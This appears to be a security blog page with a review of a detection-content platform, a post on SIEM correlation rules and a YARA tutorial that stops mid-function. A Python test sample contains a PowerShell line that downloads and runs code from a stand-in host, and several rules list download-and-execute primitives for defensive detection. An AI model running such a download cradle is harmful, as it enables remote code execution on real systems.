MITRE ATT&CK to SIEM Rules: A Practical Look at SIOR-Helper


Hey there, fellow threat hunters! 👋 Today we're talking about something that caught my attention while browsing the endless wasteland of security tools - a platform called SIOR-helper.com. It's trying to solve the gap between reading about threats and actually detecting them, which honestly is a problem we've all pretended doesn't exist while manually crafting SIEM rules.

Now, before you get excited thinking this is some revolutionary breakthrough, let me set expectations: it's not going to change your life. But it might save you a few hours of Googling "how to detect [insert technique here]" at 2 AM.

The Manual Labor Problem

Let's be honest about our current workflow. You see a shiny new attack technique, think "I should detect this," and then embark on the time-honored tradition of:

  • Reading MITRE ATT&CK documentation
  • Searching for detection strategies across 15 different blogs
  • Finding half-working examples in various SIEM languages
  • Adapting them to your specific environment
  • Testing and tuning until they don't alert on notepad.exe

SIOR is basically asking "what if we skipped some of these steps?" It's not groundbreaking, but it's not terrible either.

What SIOR Actually Offers

SIOR provides a few useful features:

Analysis Generation

You can search by keywords or threat groups and get relevant MITRE techniques. In their example, searching "ransomware" returned 73 techniques. It's faster than manually browsing the ATT&CK matrix, though let's be real - that's not exactly a high bar.


Detection Repository

For almost every technique, they provide detection rules, responses, tests, and vulnerability information. The LSASS Memory example shows 77 detection rules. That's... actually pretty comprehensive, assuming the quality is decent.

SIOR - Techniques Overview


SIEM Platform Conversion

They've integrated Sigma rule conversion for different platforms - Splunk, Elasticsearch, QRadar, LogPoint. This is genuinely useful since rewriting queries for different SIEMs is about as fun as it sounds.

A Realistic Example

Let's say you need to detect T1003.001 (LSASS Memory dumping). Here's how SIOR might help:

# Traditional approach
1. Research the technique
2. Find detection strategies from various sources
3. Write platform-specific queries
4. Test and tune for your environment
5. Hope it works

# SIOR approach
1. Search for the technique
2. Browse available detection rules
3. Convert to your SIEM platform
4. Still need to test and tune for your environment
5. Hope it works

Notice the last two steps are the same? That's because no tool can magically understand your specific environment and tuning requirements. SIOR just saves you some of the research legwork.

SIOR - Advanced Search Builder

The Reality Check

Let's address what SIOR actually is: a crowdsourced repository of detection content with some helpful automation features. It's not revolutionary, but it's practical. The platform is admittedly still in development and has bugs, which means you should treat it like any other beta tool.

The value proposition is simple: instead of starting from scratch every time, you can start from someone else's work and adapt it. That's useful, but it's not going to fundamentally change how security operations work.

Community-Driven Content

The platform allows users to create and share custom detections, which could be valuable if the community actually uses it. The success of this kind of initiative depends entirely on adoption and content quality - both unknown quantities at this point.

Integration Perspective

SIOR positions itself as a research assistant, not a replacement for thinking. It fits into your workflow like this:

  • Use it to find relevant techniques and existing detection rules
  • Leverage the SIEM conversion features to get platform-specific queries
  • Still do your own testing, tuning, and validation
  • Contribute improvements back if you're feeling generous

It's basically a shortcut through the research phase, which is fine - research shortcuts are useful.

Who Might Find This Useful

SIOR could be helpful for:

  • SOC teams that don't want to research every technique from scratch
  • Organizations without dedicated threat intelligence resources
  • Security professionals who work with multiple SIEM platforms
  • Anyone tired of manually browsing MITRE ATT&CK matrices

It's not going to replace your security tools or your brain, but it might save you some time on the mundane stuff.

Heat Map Visualization: Seeing Your Detection Gaps

One feature that's actually pretty neat is SIOR's heat map visualization of your analysis runs. When I created an analysis run for ransomware techniques, I could see a visual representation of the entire MITRE ATT&CK matrix with color-coded coverage indicators.

SIOR - Run Navigator

In my analysis, I ended up covering 88 techniques out of 1076 total techniques (8% coverage), leaving 988 techniques unanalyzed. The heat map uses different colors to show coverage levels:

  • Complete Coverage: Techniques where I found detections, responses, and tests
  • Partial Coverage: Techniques with some but not all security controls
  • Detection Only: Techniques with detection rules but no response procedures
  • No Data: Techniques I haven't looked at yet

I could filter the view to show only techniques with data, which helped me focus on what I'd actually covered versus the overwhelming sea of unanalyzed techniques. It's a straightforward way to visualize your detection gaps and prioritize where to focus next - assuming you can handle the reality check of seeing how much you haven't covered yet.
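If you want to reproduce the coverage arithmetic outside the platform, here is a minimal Python sketch. It is not SIOR's code: the function names, the control labels, and the rule that "Detection Only" means exactly one control type are my assumptions, chosen to mirror the four levels listed above.

```python
from collections import Counter

# Assumed control types; SIOR's internal model may differ.
ALL_CONTROLS = {"detection", "response", "test"}

def coverage_level(controls):
    """Classify one technique by which control types were found for it."""
    if not controls:
        return "No Data"
    if ALL_CONTROLS <= controls:
        return "Complete Coverage"
    if controls == {"detection"}:
        return "Detection Only"
    return "Partial Coverage"

def summarize(techniques, total):
    """techniques maps technique ID -> set of control types found."""
    levels = Counter(coverage_level(c) for c in techniques.values())
    covered = sum(n for level, n in levels.items() if level != "No Data")
    return {
        "covered": covered,
        "unanalyzed": total - covered,
        "percent": round(100 * covered / total, 1),
        "levels": dict(levels),
    }

# Hypothetical three-technique run against the 1076-technique matrix.
run = {
    "T1003.001": {"detection", "response", "test"},
    "T1486": {"detection"},
    "T1490": {"detection", "test"},
}
summary = summarize(run, total=1076)
print(summary)
```

Plugging in the numbers from my run, 88 covered out of 1076 works out to roughly 8.2%, which the heat map rounds to 8%.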

This kind of visual coverage analysis is genuinely useful for understanding where you stand against the full ATT&CK matrix, rather than just hoping you've got the "important" stuff covered.

The Bottom Line

SIOR is a tool that solves a real problem (the gap between threat intelligence and detection implementation) with a reasonable approach (community-sourced content with automation features). It's not perfect, it's still developing, and it won't solve all your detection challenges.

But you know what? Sometimes "good enough to try" is exactly what we need in security. We've got bigger problems than whether a free tool has some rough edges.

Is it worth creating an account and poking around? Probably. Will it revolutionize your security operations? Probably not. But if it saves you a few hours of manual research here and there, that's time you can spend on more interesting problems.

The security industry needs more practical tools that address real operational challenges. SIOR is an attempt at that, and honestly, we could use more attempts rather than fewer.

Stay safe, and happy hunting! 🕵️‍♂️

P.S. The platform offers a live example without registration, so you can check it out without committing to anything. Ah, and it's also free!

References

Ready to dive deeper into detection engineering and threat hunting platforms? These resources will help you level up your game:

From Logs to Threats: SIEM Correlation Rules for Real Attacks

SIEM correlation rules are what turn a pile of Windows events into actual detections. Single-event rules ("alert on Event 4625") generate a lot of tickets and miss most attacks; correlation rules tie events together across users, hosts, and time to recognise the shapes that matter. This post walks through three concrete attack chains and the correlation logic we use to catch them in Splunk, Elastic, and QRadar query languages.

Key Takeaways

  • Correlation rules join events across time, user, host, or source IP — a single event rarely tells the whole story.
  • Anchor each rule to a MITRE ATT&CK technique. It forces precision and gives the analyst context when the rule fires.
  • The three high-value patterns we always implement first: failed-to-successful authentication progression, suspicious PowerShell execution chain, and persistence creation right after privileged authentication.
  • Time windows are the single most-tuned setting. Too narrow and the rule misses related events; too wide and unrelated events get linked.
  • Always baseline before deploying. A correlation rule that has not seen your environment's normal patterns is guaranteed to alert on legitimate activity.

Environment

  • Windows endpoints and Domain Controllers forwarding to a central SIEM.
  • Advanced audit policy enabled — at minimum Account Logon, Logon/Logoff, Process Creation, and Object Access categories.
  • PowerShell module logging and script block logging enabled via Group Policy.
  • A SIEM that supports time-windowed joins. Examples below cover Splunk SPL, Elastic ES|QL, and IBM QRadar AQL.

The Problem

Most SIEM deployments accumulate logs faster than they accumulate detection. Single-event rules survive only until they are tuned out: "alert on 4625" becomes noise the first time someone fat-fingers a password ten times in a row. The events themselves are not the problem — they are evidence. Correlation rules use that evidence to recognise the shapes of real attacks: dwell time, lateral progression, the order in which artefacts appear.

The three patterns below cover a large fraction of the attack chains we see in mid-sized Windows environments. They are not exhaustive; they are the rules we ship first because the cost-to-value ratio is best.

The Solution

Pattern 1 — Brute force to successful logon to lateral movement (T1110.001 → T1078 → T1021)

An attacker guessing passwords over RDP against an exposed jump host succeeds, logs in, and immediately tries other internal hosts. The shape in Windows events:

  • 4625 — multiple failed logons from a single source IP over a short window.
  • 4624 — successful logon from the same source IP within a few minutes.
  • 4648 or 5140 — explicit-credential use or network-share access from the same actor shortly after.

Splunk SPL implementation:

index=windows EventCode=4625
| eval fail_time=_time
| bucket _time span=5m
| stats count as failed_count, min(fail_time) as first_fail, max(fail_time) as last_fail by src_ip, _time
| where failed_count >= 10
| join type=inner max=0 src_ip
    [ search index=windows EventCode=4624
      | rename _time as success_time
      | fields src_ip, success_time, user ]
| where success_time > last_fail AND success_time < (last_fail + 600)
| join type=inner max=0 src_ip
    [ search index=windows (EventCode=4648 OR EventCode=5140)
      | rename _time as lateral_time
      | fields src_ip, lateral_time, dest_host ]
| where lateral_time > success_time AND lateral_time < (success_time + 1800)
| table src_ip, user, dest_host, first_fail, success_time, lateral_time, failed_count

The three time windows are tunable. 10 failures in 5 minutes is conservative; drop to 5 in 1 minute for tighter detection on hardened systems. The 30-minute lateral-movement window catches slower follow-ups.
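To make the three windows concrete, here is a minimal Python sketch of the same chain logic over an in-memory list of events. It is an illustration, not a replacement for the SIEM query: the event dictionaries, their field names, and the function name find_chains are assumptions, and a sliding window stands in for the fixed 5-minute buckets.

```python
from collections import defaultdict, deque

FAIL_THRESHOLD = 10     # failed logons needed to call it a burst
FAIL_WINDOW = 300       # seconds: all failures of a burst fall inside this
SUCCESS_WINDOW = 600    # seconds: success must follow the burst this fast
LATERAL_WINDOW = 1800   # seconds: lateral activity must follow the success

def find_chains(events):
    """events: dicts with 'time' (epoch seconds), 'code', 'src_ip' (assumed schema)."""
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_ip[ev["src_ip"]].append(ev)

    chains = []
    for ip, evs in by_ip.items():
        recent_fails = deque()   # failure times still inside FAIL_WINDOW
        last_fail = None         # time of the failure that completed a burst
        success_time = None
        for ev in evs:
            t, code = ev["time"], ev["code"]
            if code == 4625:
                recent_fails.append(t)
                while t - recent_fails[0] > FAIL_WINDOW:
                    recent_fails.popleft()
                if len(recent_fails) >= FAIL_THRESHOLD:
                    last_fail, success_time = t, None
            elif code == 4624 and last_fail is not None and success_time is None:
                if 0 < t - last_fail < SUCCESS_WINDOW:
                    success_time = t
            elif code in (4648, 5140) and success_time is not None:
                if 0 < t - success_time < LATERAL_WINDOW:
                    chains.append({"src_ip": ip, "last_fail": last_fail,
                                   "success_time": success_time, "lateral_time": t})
                    last_fail = success_time = None
    return chains

attacker = [{"time": t, "code": 4625, "src_ip": "203.0.113.7"} for t in range(0, 100, 10)]
attacker += [{"time": 120, "code": 4624, "src_ip": "203.0.113.7"},
             {"time": 400, "code": 5140, "src_ip": "203.0.113.7"}]
typo_user = [{"time": t, "code": 4625, "src_ip": "10.0.0.5"} for t in (0, 5, 9)]
typo_user += [{"time": 20, "code": 4624, "src_ip": "10.0.0.5"},
              {"time": 60, "code": 4648, "src_ip": "10.0.0.5"}]
chains = find_chains(attacker + typo_user)
print(chains)
```

Only the first source produces a chain; the user who mistyped a password three times never reaches the failure threshold, which is the whole point of correlating instead of alerting on 4625 alone.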

Pattern 2 — PowerShell host with encoded staging (T1059.001 + T1105)

Operators rarely run plain powershell.exe with no arguments. The shape that matters is a host process spawned by Office or a browser, paired with script-block content that downloads and executes:

  • 4688 — process creation, parent in {winword.exe, excel.exe, outlook.exe, mshta.exe}, child is powershell.exe or pwsh.exe.
  • 4104 — script block logged from the PowerShell operational log containing DownloadString, FromBase64String, Invoke-Expression, or -EncodedCommand.
  • The two events appear on the same computer within seconds of each other. Security event 4688 records a process ID rather than a GUID, so the query below correlates on host plus a one-minute bucket.

Elastic ES|QL:

FROM logs-windows-*
| WHERE event.code IN ("4688", "4104")
| WHERE @timestamp > NOW() - 1 hour
| EVAL bucket = DATE_TRUNC(1 minute, @timestamp)
// ES|QL CASE is a function: CASE(condition, value_if_true, default).
// LIKE uses * and ? wildcards; RLIKE must match the whole value.
| EVAL is_bad_process = CASE(
      event.code == "4688"
        AND TO_LOWER(winlog.event_data.NewProcessName) RLIKE ".*(powershell|pwsh)\\.exe"
        AND TO_LOWER(winlog.event_data.ParentProcessName) RLIKE ".*(winword|excel|outlook|mshta)\\.exe",
      1, 0)
| EVAL is_bad_script = CASE(
      event.code == "4104"
        AND TO_LOWER(powershell.script_block_text) RLIKE ".*(downloadstring|frombase64string|invoke-expression|-encodedcommand).*",
      1, 0)
| STATS bad_process = SUM(is_bad_process), bad_script = SUM(is_bad_script) BY host.name, bucket
| WHERE bad_process > 0 AND bad_script > 0
| SORT bucket DESC
The host-name plus minute-bucket join handles the common case where the two events arrive seconds apart but in different channels. Add user.name to the STATS BY when running on a fleet.
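The bucket join is easy to reason about in plain code. The following Python sketch mirrors the idea under stated assumptions: the event dictionaries and their keys (process, parent, script) are hypothetical stand-ins for whatever your pipeline emits, and suspicious_buckets is an illustrative name.

```python
import re
from collections import defaultdict

OFFICE_PARENT = re.compile(r"(winword|excel|outlook|mshta)\.exe$", re.I)
PS_CHILD = re.compile(r"(powershell|pwsh)\.exe$", re.I)
STAGING = re.compile(
    r"downloadstring|frombase64string|invoke-expression|-encodedcommand", re.I)

def suspicious_buckets(events):
    """Return (host, minute) keys that saw both a bad 4688 and a bad 4104.

    events: dicts with 'time' (epoch seconds), 'host', 'code', plus
    'process'/'parent' for 4688 or 'script' for 4104 (assumed schema).
    """
    seen = defaultdict(set)
    for ev in events:
        key = (ev["host"], ev["time"] // 60)   # one-minute bucket per host
        if (ev["code"] == 4688 and PS_CHILD.search(ev["process"])
                and OFFICE_PARENT.search(ev["parent"])):
            seen[key].add("process")
        elif ev["code"] == 4104 and STAGING.search(ev["script"]):
            seen[key].add("script")
    return sorted(k for k, kinds in seen.items() if kinds == {"process", "script"})

events = [
    {"time": 600, "host": "ws01", "code": 4688,
     "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"time": 605, "host": "ws01", "code": 4104,
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"},
    {"time": 610, "host": "ws02", "code": 4688,
     "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe"},
]
hits = suspicious_buckets(events)
print(hits)
```

One design consequence worth knowing: fixed buckets miss a pair that straddles a minute boundary (say 10:00:59 and 10:01:02). If that matters in your environment, check adjacent buckets as well or use a sliding window.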

Pattern 3 — Persistence right after privileged authentication (T1078 → T1543/T1547)

Most credential theft is only valuable if the attacker plants persistence with the stolen identity. The signal is a new service or Run-key registration shortly after an administrative logon:

  • 4672 — special privileges assigned to a new logon (administrator).
  • 7045 — new service installed (System log); or 4657 — registry value modified under a Run key (Security log, requires Object Access audit).
  • Same user and same host within ~10 minutes.

QRadar AQL:

SELECT
    "User Name"    AS user,
    sourceaddress  AS src,
    MIN(starttime) AS first_event,
    MAX(starttime) AS last_event
FROM events
WHERE
    (eventid = '4672' OR eventid = '7045' OR eventid = '4657')
-- Group on user and source only: 4672 carries no service name, so grouping
-- on "Service Name" would keep the logon and the service install apart.
GROUP BY "User Name", sourceaddress
HAVING
    UNIQUECOUNT(eventid) >= 2
    AND (MAX(starttime) - MIN(starttime)) < 600000   -- 10 minutes in ms
ORDER BY first_event DESC
LAST 2 HOURS

The 10-minute window is the practical floor for "this looks like one person acting". Tighten it for high-fidelity service tiers; widen it for environments where legitimate admins genuinely do install services in batches.

Step 4 — Build a baseline before you deploy

Every correlation rule needs a baseline run before it goes live. Pull the rule's query, drop the alerting threshold, and look at what fires over the last 30 days. Common surprises:

  • Scheduled tasks that legitimately spawn PowerShell at 02:00 every night.
  • Backup or imaging tools that touch service and registry keys at boot.
  • Helpdesk admin tooling that performs explicit-credential logons across hosts.

Each of these turns into an exclusion: a user, a host, a parent process, a service name. Document the exclusion in the rule's metadata so the next analyst can see why it is there.

Step 5 — Anchor every rule to a MITRE ATT&CK technique

Tagging rules with the technique they detect does two things: it forces you to be specific about the behaviour, and it gives the analyst a starting point for response. The three rules above map cleanly:

  • Pattern 1 → T1110.001 (Password Guessing) + T1021 (Remote Services)
  • Pattern 2 → T1059.001 (PowerShell) + T1105 (Ingress Tool Transfer)
  • Pattern 3 → T1543.003 (Windows Service) or T1547.001 (Registry Run Keys)

Once every active rule has a technique tag, you have a coverage map. Gaps in the map are where to invest next.
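A coverage map can be as small as a dictionary. This Python sketch assumes rule names of my own invention and a hypothetical priority list; only the technique IDs for the three patterns come from the mapping above.

```python
from collections import defaultdict

# Rule names are illustrative; the tags follow the three patterns above.
RULE_TAGS = {
    "bruteforce_to_lateral": ["T1110.001", "T1021"],
    "office_spawns_powershell": ["T1059.001", "T1105"],
    "persistence_after_priv_logon": ["T1543.003", "T1547.001"],
}

def coverage_map(rule_tags, priority_techniques):
    """Invert rule -> techniques into technique -> rules and list the gaps."""
    covered = defaultdict(list)
    for rule, techniques in rule_tags.items():
        for technique in techniques:
            covered[technique].append(rule)
    gaps = [t for t in priority_techniques if t not in covered]
    return dict(covered), gaps

# Hypothetical priority list for this environment.
priorities = ["T1110.001", "T1021", "T1059.001", "T1003.001", "T1543.003", "T1486"]
covered, gaps = coverage_map(RULE_TAGS, priorities)
print(gaps)
```

Here the gaps are T1003.001 and T1486, which tells you the next rules to write target LSASS memory access and data encryption for impact.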

Step 6 — Measure what the rules actually deliver

Each rule needs three running metrics:

  • True positive rate — share of alerts the IR team confirmed as real activity. Target above 50%.
  • Time to detect — minutes between the first contributing event and the alert. Aim for under five.
  • False positive rate — share of alerts closed as benign. Above 20% means tune; above 50% means disable and rebuild.

Track them in a small Splunk/Kibana dashboard. Without them the rules drift, and "the SIEM is too noisy" becomes the same lived experience all over again.
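If the dashboard is not built yet, the same three numbers can be computed from an export of closed alerts. The sketch below is a minimal Python version; the alert schema (verdict, first_event, alerted) and the function name are assumptions, and the thresholds are the ones listed above.

```python
from statistics import median

def rule_metrics(alerts):
    """alerts: dicts with 'verdict' ('true_positive' or 'benign') and
    'first_event' / 'alerted' as epoch seconds (assumed schema)."""
    closed = [a for a in alerts if a["verdict"] in ("true_positive", "benign")]
    if not closed:
        return None
    tp_share = sum(a["verdict"] == "true_positive" for a in closed) / len(closed)
    fp_share = sum(a["verdict"] == "benign" for a in closed) / len(closed)
    minutes = [(a["alerted"] - a["first_event"]) / 60 for a in closed]
    if fp_share > 0.5:
        action = "disable and rebuild"
    elif fp_share > 0.2:
        action = "tune"
    else:
        action = "keep"
    return {
        "tp_share": tp_share,
        "fp_share": fp_share,
        "median_minutes_to_detect": median(minutes),
        "action": action,
    }

alerts = (
    [{"verdict": "true_positive", "first_event": 0, "alerted": 120}] * 7
    + [{"verdict": "benign", "first_event": 0, "alerted": 240}] * 3
)
metrics = rule_metrics(alerts)
print(metrics)
```

With every alert closed as either confirmed or benign, the two shares are complements, so the 50% true-positive target and the 50% false-positive cutoff describe the same line. The 20% threshold is the one that triggers tuning first.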

Frequently Asked Questions

Why not just use vendor-shipped correlation packs?

Use them as a starting point, but expect to rewrite most. Vendor packs target the broadest possible audience, which means generous thresholds and field assumptions that may not match your environment. The rules above are specific to Windows events and tuned for normal admin behaviour; a vendor pack cannot know what "normal" looks like for you.

How tight should the time windows be?

Tight enough that unrelated activity does not get joined, loose enough that genuine attack chains stay connected. For interactive attacks, 5–15 minute windows are usually right. For staged or low-and-slow campaigns, hours; for ransomware execution sequences, seconds.

What about correlation across data sources, not just Windows logs?

Same idea, more keys. Add EDR alerts, firewall denies, and proxy logs to the join key on user, host, and time. The cost is field normalisation — different sources use different field names, so plan ingestion-side mappings before writing the rule.

Can I express these in Sigma?

Most single-event detections, yes. Sigma's correlation extension (introduced in Sigma 2.x) covers temporal joins and N-of-M aggregations, which is enough for the three patterns above. Convert Sigma to your SIEM's native query language with the official Sigma converter rather than maintaining two versions.

How often should I re-tune correlation rules?

Every quarter, plus any time the environment changes materially (new EDR deployment, new admin tooling, a different patch cadence). Track the three metrics above and re-tune when any drift outside its target.

Conclusion

A SIEM that just stores logs is an expensive log store. The leverage comes from correlation: a small number of rules that recognise the multi-step shapes attackers actually move in. Start with the three patterns above, anchor each rule to a MITRE technique, baseline before deploying, and measure every alert. Within a quarter the same SIEM will be telling you genuinely useful things — and the alert volume will go down, not up.

Related Posts

Authoritative references: MITRE ATT&CK and SigmaHQ rule project.

YARA Rules for Beginners: Teaching Your Computer to Spot Bad Guys

YARA rules are the closest thing defenders have to a structured language for describing malware. Antivirus signatures match exact bytes; YARA matches patterns, conditions, and combinations of both. This post is the starting point we hand to new threat-hunting analysts on the team — what YARA is, the parts of a rule that actually matter, and a working ruleset for the patterns that come up most often.

Key Takeaways

  • A YARA rule is three sections: meta (author, date, description), strings (patterns to match), and condition (when the rule fires).
  • The pe, elf, and math modules turn YARA from a string-matcher into a structural analyser of binaries.
  • Conditions can count occurrences (#string1 > 5), reference subsets (any of ($a*)), or test file properties (filesize < 1MB).
  • False positives are the main risk. Use fullword, hex anchors, and PE structure tests to keep rules tight.
  • YARA is one tool in a defender's kit. Pair it with VirusTotal, Sigma rules in the SIEM, and Microsoft Defender for Endpoint or another EDR for layered detection.

Environment

  • YARA 4.5 or later (the version with the modern pe module).
  • Windows, macOS, or Linux — YARA is cross-platform.
  • Python 3.10+ with yara-python if you want to embed YARA in scripts.
  • A controlled lab environment for testing rules against real samples. Scan production binaries with YARA, but never run live samples on production systems.

The Problem

Manual triage scales poorly. Looking at every executable that lands on a fleet, every attachment that hits a mailbox, every file an EDR flags as "potentially unwanted" is not realistic past a few hundred hosts. YARA's value proposition is offloading the first pass: a well-written rule recognises a family at scale, lets you cluster samples that share a signature, and gives an analyst something to read other than "this looks suspicious".

The tradeoff is that a rule which fires on legitimate software is worse than no rule at all — it teaches the analyst to ignore output. The recipes below lean on signal that is statistically uncommon in clean code: API combinations rather than single API names, hex sequences from unpacking stubs, and PE structure abnormalities that almost never appear in signed third-party software.

The Solution

Step 1 — Read the anatomy of a rule

Every YARA rule has the same three-part shape:

rule example_rule
{
    meta:
        author      = "Security Scriptographer"
        date        = "2026-05-28"
        description = "Brief description of what this catches and why"
        reference   = "URL or hash you derived the rule from"
        severity    = "medium"

    strings:
        $text = "literal string"
        $hex  = { 4D 5A ?? ?? 50 45 }    // ?? is one wildcard byte
        $re   = /https?:\/\/[a-z0-9.]+\/[a-z]{3,}\.exe/i

    condition:
        any of them
}

meta is documentation. It is optional to YARA but mandatory for anyone reading the rule three months later. Always include the date, the author, and one sentence on what the rule is for.

Step 2 — Use string modifiers to control what matches

Plain strings are case-sensitive, ASCII, and match anywhere. Modifiers tighten the match:

strings:
    $a = "powershell"                       // exact, case-sensitive
    $b = "powershell" nocase                // case-insensitive
    $c = "PowerShell" wide                  // UTF-16 (typical of .NET / Windows strings)
    $d = "powershell" ascii wide            // both encodings
    $e = "powershell" nocase ascii wide fullword
    $f = "powershell" base64                // matches the base64 encoding of the bytes
    $g = "powershell" xor                   // matches XOR-encoded variants

fullword requires the match to be delimited by non-alphanumeric characters, so IEX no longer matches inside IEXPLORE.EXE. base64 and xor are how you catch packed payloads that contain encoded versions of plaintext strings.
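The fullword rule is simple enough to emulate, which helps when predicting what a string will and will not hit. This Python sketch is an approximation for ASCII strings only, not YARA's implementation; the function name is made up for illustration.

```python
def fullword_matches(data: bytes, needle: bytes) -> list:
    """Offsets where needle appears delimited by non-alphanumeric bytes or buffer edges."""
    hits = []
    start = data.find(needle)
    while start != -1:
        end = start + len(needle)
        # bytes.isalnum() is ASCII-only, which is what we want here.
        before_ok = start == 0 or not data[start - 1:start].isalnum()
        after_ok = end == len(data) or not data[end:end + 1].isalnum()
        if before_ok and after_ok:
            hits.append(start)
        start = data.find(needle, start + 1)
    return hits

print(fullword_matches(b"IEX (New-Object Net.WebClient)", b"IEX"))
print(fullword_matches(b"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE", b"IEX"))
print(fullword_matches(b"www.mydomain.com", b"domain"))
print(fullword_matches(b"www.my-domain.com", b"domain"))
```

The first and last calls find a match because the needle is bounded by a space, a hyphen, or a dot. The middle two find nothing because a letter touches the needle on one side.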

Step 3 — Use hex patterns for unpackers and known byte sequences

Hex strings let you express byte patterns with wildcards, alternations, and jumps. They are the right tool for matching prologues, magic numbers, and small code fragments:

strings:
    $mz_pe = { 4D 5A [60-260] 50 45 00 00 }       // MZ … PE\0\0 with a variable gap
    $entry = { 55 8B EC 83 EC ?? ?? FF 75 ?? }    // typical x86 prologue + arg
    $alt   = { 4D 5A ( 90 | 50 ) 00 }             // either of two next bytes

Hex patterns are dramatically faster to evaluate than regular expressions. Prefer them when the data you are looking for has a stable byte signature.
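To see what wildcards, jumps, and alternations mean byte by byte, it can help to translate a hex string into a regular expression over bytes. The Python sketch below does that for a subset of the syntax. It is a teaching aid with an assumed function name, it expects space-separated tokens, and it does not handle nibble wildcards such as 4?.

```python
import re

def hex_to_regex(pattern: str) -> "re.Pattern":
    """Translate a space-separated YARA-style hex string into a bytes regex."""
    parts = []
    for tok in pattern.split():
        if tok == "??":
            parts.append(b".")                      # any single byte
        elif tok in ("(", "|", ")"):
            parts.append(tok.encode())              # alternation passes through
        elif tok.startswith("[") and tok.endswith("]"):
            body = tok[1:-1]                        # "60-260", "4", or "10-"
            low, sep, high = body.partition("-")
            bounds = f"{low},{high}" if sep else low
            parts.append(b".{" + bounds.encode() + b"}")
        else:
            parts.append(re.escape(bytes.fromhex(tok)))
    return re.compile(b"".join(parts), re.DOTALL)   # DOTALL: '.' also matches 0x0A

mz_pe = hex_to_regex("4D 5A [60-260] 50 45 00 00")
alt = hex_to_regex("4D 5A ( 90 | 50 ) 00")

sample = b"MZ" + b"\x00" * 62 + b"PE\x00\x00"
too_short = b"MZ" + b"\x00" * 10 + b"PE\x00\x00"
print(bool(mz_pe.search(sample)), bool(mz_pe.search(too_short)))
print(bool(alt.search(b"MZ\x90\x00")), bool(alt.search(b"MZ\x41\x00")))
```

The 62-byte gap falls inside the [60-260] jump and matches; the 10-byte gap does not. The alternation accepts 0x90 or 0x50 as the third byte and rejects anything else.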

Step 4 — Compose conditions deliberately

The condition is what controls false-positive rate. Three patterns get the most mileage; each expression below is an alternative condition, not one combined rule:

condition:
    // N of M: at least N of the listed strings present
    2 of ($net*) and 1 of ($crypto*)

    // Structural anchor + content: must look like a PE, must contain specific bytes
    uint16(0) == 0x5A4D and filesize < 5MB and any of ($mark*)

    // Negative conditions: avoid matching legitimate files
    any of ($mal*) and not any of ($benign*)

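uint16(0) == 0x5A4D is the cheap way to confirm "this is a PE" without importing the pe module. It only checks for the MZ magic at offset 0, so it also passes DOS executables and anything else that starts with those two bytes, but in practice it catches roughly the same set of files at a fraction of the runtime cost.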
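Here is what that check does at the byte level, as a small Python sketch using the standard struct module. The function names are illustrative. The second function adds the stricter test that follows the e_lfanew pointer at offset 0x3C to the PE signature, which in YARA is usually written as uint32(uint32(0x3C)) == 0x00004550.

```python
import struct

def has_mz_magic(data: bytes) -> bool:
    """Equivalent of uint16(0) == 0x5A4D: little-endian read of the bytes 4D 5A."""
    return len(data) >= 2 and struct.unpack_from("<H", data, 0)[0] == 0x5A4D

def looks_like_pe(data: bytes) -> bool:
    """MZ magic plus the 'PE\\0\\0' signature at the offset stored in e_lfanew."""
    if len(data) < 0x40 or not has_mz_magic(data):
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

# Synthetic 64-byte DOS header pointing at a PE signature at offset 0x80.
dos_header = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x80)
fake_pe = dos_header + b"\x00" * 0x40 + b"PE\x00\x00"
not_pe = b"MZ just happens to start this text file".ljust(0x80, b" ")

print(has_mz_magic(fake_pe), looks_like_pe(fake_pe))
print(has_mz_magic(not_pe), looks_like_pe(not_pe))
```

The text file passes the two-byte check and fails the stricter one, which is the trade-off: the cheap test is fine as a first filter, and the pointer check is there when the false positives start to matter.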

Step 5 — A practical rule for suspicious PowerShell artefacts

This is the rule we run against every new attachment that lands in our triage queue. It is permissive enough to be useful and tight enough that the analyst can read the hit and decide:

rule SS_Suspicious_PowerShell_Artifact
{
    meta:
        author      = "Security Scriptographer"
        date        = "2026-05-28"
        description = "PowerShell host invocation paired with at least one staging primitive"
        severity    = "medium"

    strings:
        $host1 = "powershell" nocase ascii wide
        $host2 = "pwsh"       nocase ascii wide

        $arg1 = "-enc"               nocase ascii wide
        $arg2 = "-encodedcommand"    nocase ascii wide
        $arg3 = "-w hidden"          nocase ascii wide
        $arg4 = "-windowstyle hidden" nocase ascii wide
        $arg5 = "-noprofile"         nocase ascii wide
        $arg6 = "-executionpolicy bypass" nocase ascii wide

        $api1 = "DownloadString"    nocase ascii wide
        $api2 = "DownloadFile"      nocase ascii wide
        $api3 = "Invoke-Expression" nocase ascii wide
        $api4 = "IEX"               fullword ascii wide

    condition:
        any of ($host*) and 1 of ($arg*) and 1 of ($api*)
}

The N-of-M shape means the rule never fires on a casual mention of PowerShell in a help file, but does fire on the staging combination that loaders use. Tune the threshold per environment.

Step 6 — PE structure matching for packed and weird binaries

Importing the pe module exposes the parsed PE structure. Packers, droppers, and signed-malware-with-trailing-data look obviously different from clean files at this level:

import "pe"
import "math"   // required for math.entropy below

rule SS_Packed_PE_Indicators
{
    meta:
        author      = "Security Scriptographer"
        date        = "2026-05-28"
        description = "Heuristic: PE with very few sections and a low entry-point offset, plus a UPX section name or a high-entropy section"
        severity    = "low"

    condition:
        pe.is_pe and
        pe.number_of_sections < 3 and
        pe.entry_point < 0x1000 and
        (
            // UPX names its sections UPX0 / UPX1, without a leading dot
            for any section in pe.sections : ( section.name == "UPX0" ) or
            for any section in pe.sections : ( math.entropy(section.raw_data_offset, section.raw_data_size) > 7.5 )
        )
}

High section entropy (>7.5) is a strong indicator of compression or encryption. Combine with section-count and entry-point heuristics to drop false-positive rate.
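The 7.5 figure is Shannon entropy in bits per byte, on a scale from 0 to 8. A minimal Python sketch of the calculation (the function name is mine) shows why packed data stands out:

```python
import math
import os
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
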